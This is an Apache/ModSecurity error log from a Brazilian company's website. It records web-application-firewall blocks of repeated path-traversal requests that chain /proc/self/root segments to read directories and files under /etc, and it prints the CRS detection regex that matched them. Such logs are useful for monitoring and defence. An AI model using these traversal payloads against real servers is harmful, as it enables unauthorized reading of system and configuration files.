[Mon Mar 16 12:38:25.997055 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:47704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj8Zqj1wV0Si-OkeftNAAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:28.243460 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:47710] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj9P9ocpUE4ed4uDzukQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:29.532706 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:47702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj9f9ocpUE4ed4uDzukgAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:32.913758 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.241.46:47712] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj-AlT9VtDQc7bgUywuAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:37.507621 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.241.46:47726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj_QlT9VtDQc7bgUywvgAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:38.564576 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:42494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj_tSswJuvopo3lOhd8QAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:38:38.846959 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:50068] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj_rABkC4fWIHEf8HpnwAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:39.871679 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.243.203:33642] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgj__9ocpUE4ed4uDzulgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:38:40.138956 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.241.46:50084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkAHjZBu2q05ozVU9XMQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:41.137034 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:39650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkAXbQATo66fKoS7xOWgAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:38:42.537420 2026] [:error] [pid 10709:tid 140411699963648] [client 74.7.241.46:50086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkAhXjF1vJNtV6CWr1AAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:44.958642 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:50102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkBHjZBu2q05ozVU9XNwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:47.009191 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.243.203:39660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkB3bQATo66fKoS7xOXgAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:38:47.379571 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:50108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkB7ABkC4fWIHEf8HpogAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:50.759649 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:48528] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkCv9ocpUE4ed4uDzunwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:38:52.955648 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:39664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkDP9ocpUE4ed4uDzuogAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:38:55.228816 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:43062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkD7ysWC90G-1nBrBEcwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:38:57.956099 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.244.31:59588] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgkEQlT9VtDQc7bgUywwgAAAQk"]
[Mon Mar 16 12:38:59.178781 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:43070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkExXjF1vJNtV6CWr1BwAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:00.443436 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:48542] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkFHbQATo66fKoS7xOaAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:39:02.542237 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:47520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkFhXjF1vJNtV6CWr1DQAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:08.126713 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.241.46:55810] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkHHjZBu2q05ozVU9XRQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:39:09.405376 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:53520] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkHXjZBu2q05ozVU9XRwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
